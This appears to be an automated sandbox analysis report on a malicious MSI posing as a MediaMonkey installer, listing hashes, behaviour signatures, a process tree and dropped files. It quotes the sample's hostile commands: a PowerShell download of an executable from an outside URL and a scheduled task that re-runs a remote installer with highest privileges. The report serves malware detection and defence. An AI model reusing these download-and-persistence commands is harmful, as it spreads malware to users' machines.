Overview

overview

10

Static

static

1

adf35549a2...18.msi

windows7-x64

10

adf35549a2...18.msi

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    15-06-2024 10:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    adf35549a252723b8e392ef1643134d8_JaffaCakes118.msi

  • Size

    248KB

  • MD5

    adf35549a252723b8e392ef1643134d8

  • SHA1

    0ecafc6cf721543057b7206c0816c106c919e961

  • SHA256

    8306ac8c8238290885ea335365248c0ca13f5119a7eec7b030721b1a62a33f3a

  • SHA512

    014f4bf78b0f4452580c83120267edf1a09006892a0357923aee7a83ebfa416ac233203c8889aed8ebd36a9b02b41707a3e706d5aca8124d5ce269b071ff2ec7

  • SSDEEP

    3072:d39LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDOwqQ+cxbkRqMGOG:FuH2aCGw1ST1wrL5qv

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/pavelenko/Media/master/MediaMonkey_4.1.21.1873.exe

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops file in Windows directory 10 IoCs
  • Loads dropped DLL 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 43 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 62 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\adf35549a252723b8e392ef1643134d8_JaffaCakes118.msi
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:3000
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2932
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 24A0861BC118DF4972B652DC81AD17DB
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1856
      • C:\Windows\syswow64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\\MediaMonkey_4.1.21.1873\run.cmd" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1084
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "inst.cmd"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1068
          • C:\Windows\SysWOW64\net.exe
            net session
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3064
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 session
              6⤵
                PID:2040
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn "IZKCKOTP-6915" /tr "msiexec /ihttps://anicesicerom.com/2280324028 /q" /sc minute /mo 140 /rl highest /f
              5⤵
              • Creates scheduled task(s)
              PID:1744
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" http://player.go-mediamonkey.org/
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:304
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:304 CREDAT:275457 /prefetch:2
              5⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:844
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "$dl = New-Object System.Net.WebClient;$dl.Headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.1)';$f = 'monkey_4.1.21.1873.exe'; $dl.DownloadFile('https://raw.githubusercontent.com/pavelenko/Media/master/MediaMonkey_4.1.21.1873.exe', $f);Stop-Process -Name powershell"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:808
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1644
    • C:\Windows\system32\DrvInst.exe
      DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005B0" "00000000000003C0"
      1⤵
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious use of AdjustPrivilegeToken
      PID:1568

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      a1a63a0053fdd1b534c73f5046a175e2

      SHA1

      97387c1dcfec52c778cf8373bc9d4fbb469d1476

      SHA256

      f96bfa21a9b30be61231d07a8d444bf47105be98052c4b663329efec2a2110d4

      SHA512

      5a86c64f773aeb28acfa2d31910240ac67333261198f51fbaec543ea4dbc4081fb28649dbf5f9da97f9e196c9c9c0753862b34ea7a25e4c1ab199b957dbb4f51

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      5d06ac61a0c17d457903ecc59a0c50fb

      SHA1

      90d09c94c84a4e7e27a3483cbf0c172e6561bb06

      SHA256

      9aecf2bca2cba9e5444dd45975242cac8532811cd925759d93df6fe52cb5a990

      SHA512

      ac7f00fc286a29f32749879e52ebc6c553ce761b9561ba9a00c9fc207d803a69472469aa91530315efb76713f2e04ed77c03c648b0a2cd848e7e210da1ffc1cd

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      6e4bf6523e181cda05b7ef259e439f6d

      SHA1

      deabf248b21283f1350f7d460ffeb954e30c0985

      SHA256

      0e8f04c5e64d74b7402df4fe92610946de359e7c3c5eb77b993febf26b904904

      SHA512

      8978ba580608bcefc6968b9e1159bbc93041d9b85a94672ccaf420d0ae2c6c553951d1b64997d448b6d7cb446d27f4fbbf54ce9b7c9480504747011281f52dc9

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      449633337bfb3a8628ea6649381913d0

      SHA1

      d5bda9d80f39a33f5867a33475fe71dff980799c

      SHA256

      d7a57753e7958186a5e40b77c9a442cc7fee657121145a5b10758f8813636d46

      SHA512

      17ce2396a2917923634e7ea611ef1702a102041154dc067373c013b2634e4cdc9dfd6c49e1aa8ac7230963aae274970b2621f331eeb3970b4c9087f13d2df296

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      09a1a55a61a9a90eb71ff1a963ef6324

      SHA1

      c7c2d9fa6945d51e55eaa8d265b4c3c9338ee307

      SHA256

      5a6c9fc23f4c42cc8e0d1fe4a712867d623f5c6602b7914811df2c0258e76d91

      SHA512

      04d1972b231e575516d5aa605aca33e3e79b2aef8877e4839e6bf46bb7561690f9cc5a4db26be1a0e11fdc582b14c84544db3d56f375b42d3c2075e1fe432671

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      0fcb4daf21eb3fbd0a55c71c6037a494

      SHA1

      06268ecea8dd0aeef523a7fe33ece752167b9d3b

      SHA256

      5a8d84e40a657922d73115f256cf48dc08e67f00a43d65dfd3bb01543ebcf399

      SHA512

      396f3b4c1adf2e90e66656f05591dcfa9600833b9a1da51b48f4c4a8e54093873500556c27ea34de360dfca35c331d0e8fc0aec9a4e32596416e380e8d61776d

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      ee679272d3bf883fdf4572d42372e491

      SHA1

      7db77de835ef59fa3e3e92bc0fcd4516b460d430

      SHA256

      6ba0c6357eaf9048e23900bbc5def8ee0eecaac5ba49a5c1ae507e38eb43cd2b

      SHA512

      49fba9e8c1349464f18d2a68d1122156440de72ad67d82305699fa51137ec067c293add22c1333da557338a40c172042db94d21cb71c35ea6101ccecdcfaa6f0

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      cac1b0f304f0245cfd1428724e00056e

      SHA1

      2e978931e355b735c977610df0d5ea49d7bfd303

      SHA256

      2b56ae859fd718fc8537d94e8df635a27323a213884b9c475331c1bc4294875c

      SHA512

      184025bbaeb9ddc715970c6e9daa9779c304bc4081e799d99ad3be98f2d0836f8c335355743b27f9048daa6cc5f0a673b910d6060426e96e34ac25a961eac2cb

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      3dc5405b368a9e3d6b46e069144e49a2

      SHA1

      545d6708f842b19a94c79300650e4d6875871460

      SHA256

      1db3b17586480019c3db074526cb94b7ec70dc0f0d750c1f67ec39ef5f084bb6

      SHA512

      d0d38b1305317a1bd4331ade1777c8034ccab3aabb2952282f272391c56ac226c2af666dc76e3df03858fcfa9568941de21008d78a1dc4df273bf66e8b6e48f9

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      67ff3ebc2dea5eeab968c325c5dacf29

      SHA1

      f6a3fa03e3308f352b3f4c7d19de5cc88a0878ed

      SHA256

      f16583cb8ffccd4627eb415235c0690a30cd3fbf773b635171db47dac9e95cbd

      SHA512

      0fd1644a7943452b61877948b5012112d2a945c8f966900b6831fd5dc90c92c9b8c70bffded2d1b68c52161033e61e8ff8402578eb61e0fc2abba34e756979f1

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      e90dfb81f071b986cabb753a0cee49b5

      SHA1

      a7a16290ea707c1fe1893d5f1dbd21985deb77d5

      SHA256

      eee650f45bf69646a84d2056b3a49c86e4f06a995969b1299d61b65f2669528e

      SHA512

      a3145079e2dd6575baad2bdedfd4177234a8c6c91f7ca711bc17302775c70bf02ed423a175efa3f9beae961118e36f022d4c9dba27d2ce0200c44ccaa214ab08

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      fa8ba9d3d477f0754650cd745c284386

      SHA1

      c8fb80848c38b5e33565b5c084a30d820fcdde2e

      SHA256

      72b2bcdc6934dc12328ee9ea7a48194d3090e6cc5dea0608be6ad9c571aa0700

      SHA512

      33fdb445208b62562688dc8db34b68a3baf826714ffc6d389f6b6dd7057b0756c9e3efd6fbb978546a07ba1a7236208d4e80f61102ad60ada694107142d1094f

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      42615182eb1193fd30eb263fc9013127

      SHA1

      6d788fb171e7d3379ee18e09fe6016ec336b71bb

      SHA256

      dd804278fd1df1349f4ad61f3c8c820246115725b30191b2094289c72932ccf8

      SHA512

      9e09d5874d64a43aa2f3dff83fc90f50658c83ffc69c45164d69a97b8512a447232fa9ba90e2d27c834a064425306b419e23730135f8aee8a52ebe3f567a7fd3

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      af966eb5d35e6e2d3177f0195bc30967

      SHA1

      64151a83d0ba4a3473ac5d203c4c1061048ce08f

      SHA256

      53960484cf5be74e0818c2a81263c7e51f9fd107b6f5ed2427004ca86f82cd7a

      SHA512

      309b59d5e81229a94a737ba63a938c055df009638d809cfd785281f9659c26a8c07d755c70b9da6ba1530d42cc38d817ed559c3969a3fea6853911ff6b4586e9

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      c6eaa7db6074fb8199776d2d0f682131

      SHA1

      a2375ab5a8ae970aec30dcbecb0831e56a3c7e0e

      SHA256

      cd19c536bcf17cb40ca988a63586ed40857fd834fe3f605c7f7ba8f3195d48be

      SHA512

      82ecceba86f2723866d65858c84d9aa1d72e354cb7b6bb82baa4b2c055264d6dcc37affd4842b8043d1744cc87176efa9da58f318affe3a69a4a8ce5dc5f590e

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      0798ea11f7a36ef4cdaebe1d94f06b18

      SHA1

      4d0ee433bafbeabd6012cecc12518cc0ed364cf0

      SHA256

      40af8f4a75409646d3bf19e09d51dfdc6276f90f1e1ab3ffdd35f2afaf3d4a5d

      SHA512

      779d0515e7eed2104b31e18808a9c4880b4ca5e17b2998a177934d99bf4b11439e38dbe06b1770b4134e72de7e7d281d7a8b4c9015671bf33cc27bc916254735

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      fa44c56d373a062629ae5de72400ebd1

      SHA1

      755bb9def1a63e327f1815863d96b92e7b13bfa3

      SHA256

      4dea62d6a0c6e015490f5ed28c31a5f789ff2bc44f6232814c4f04ea3d082530

      SHA512

      3089ec8704f5a029f05c32d1456894016987b721a746765ed1cef6fa7b887264dbe5e8b5b3fabdaea4160a24f97645096c98f4b749d8e60354e40635e05e6310

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      d865606bf63f80398a4893208230010f

      SHA1

      ef79ebf7f786c2e6b7f4788d5888b0600318b557

      SHA256

      8a78eecf50ef9afb02d408d2d6b71782b28a6985a0b27e7e5d769b9dd2829453

      SHA512

      68988149d9ccffbecc34c16063cf5fb7e2df6672f396e8a1eee184e6e2fa17de244ea33ce65389a8e3e74e064c171d2c7781122a39dbc2f480611f47ce9a15f6

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      2d6a2656b46d31667c93e0a5fea9296a

      SHA1

      2202001820c290e27141e0abce79e6febeb74bdc

      SHA256

      b2dec81039ef84c4dfc7fe6066070d61d2885fd4ae850c69cbe124676c3341d8

      SHA512

      d0fe6baff335dce62663ab0a8ad187769186182c97a3b50a8d90697bda71a46795ae9237b7d873c4f1055533b57e2a72f03b81e137ac951a901041263b239ac1

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      54b0473aca53c56117ae3de47e59295a

      SHA1

      93c5aa1b72e60b4aac02a9e7ef0640ae33b90bca

      SHA256

      546cdb539456f7534cc59baa7dab545edf5d66289803224ac53e5fe9eed33258

      SHA512

      b3261a41007d82ba663a9f8bcd04146c28077d9ce907676e20c202540e72bf6cb36d2efc9df52a1ad66584bd64b95820851667129ef8212bf58c1a5409e2432f

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      b8c0c98860923a84bf5df8cfa6b8407e

      SHA1

      1faca83359b8d98098961db4ea45f42f7a32403d

      SHA256

      d7ea0244c6489d3126df88a6f49842a9adacbede3147455b2bc55431b074d6ce

      SHA512

      feff5bd462d8175d212e17a35dea2ea506a3508ce352e46f985b49ddc9003701e902b1305bc62d63bfb7d2cec7cf4e3b5dfcdc6a852fb3e8b2e5689bf4c1643d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\MediaMonkey_4.1.21.1873\inst.cmd
      Filesize

      1KB

      MD5

      48db9fdf724085cc0a8e122b3951d9a8

      SHA1

      d536d6da6e9adf5afe5c93032a8586d430b552ee

      SHA256

      a9d926d4b34c5c9498b8a9e4860e00adb614a438d9c1c641cb9a8cef598159de

      SHA512

      10fa4ea04f187fcef18648ae084a9b3a50feb602fb723a73aae2f79dfa1e9b72aaf1484890d3d5f465dbeffb3fd680fa331f1912fa11c91ee9f5234367ca5dad

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\MediaMonkey_4.1.21.1873\run.cmd
      Filesize

      990B

      MD5

      0423809b82bcb00a153b8867618ba42f

      SHA1

      56e8b23af2d20885acdd0099c07da6117ee9edad

      SHA256

      aa2a5351bf923990a8d3cb3709386a6e4df6c6e5efdbfbe1198456f3a3a19a38

      SHA512

      26364e8496bbe62667faca27c83a2d39b66a2db204bb954fb7874eae577872a5046f6882423c44a72ce7dd11cd3ee49f90e1e04a8f68be3e6d825835b4c17c37

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Tar23BD.tmp
      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      Download Submit

    • C:\Windows\Installer\MSI4FB4.tmp
      Filesize

      202KB

      MD5

      24fb548e48a7c771327a8f3aba6f898e

      SHA1

      3afad7f09e8827db00552f71137c40459414fc9f

      SHA256

      9e6ef372b96df65eff4358216a545e4eeb4fa5845264359de7de06443bf5fbda

      SHA512

      be1d7f7d40181f3c5d0ab21c3b2fd17043bf26c12b766bf9c6cd183580d73b8b12491862db849cf98740ea6cc92dc05a15c396ca0969bd6ab3431b581cf6169b

      Download Submit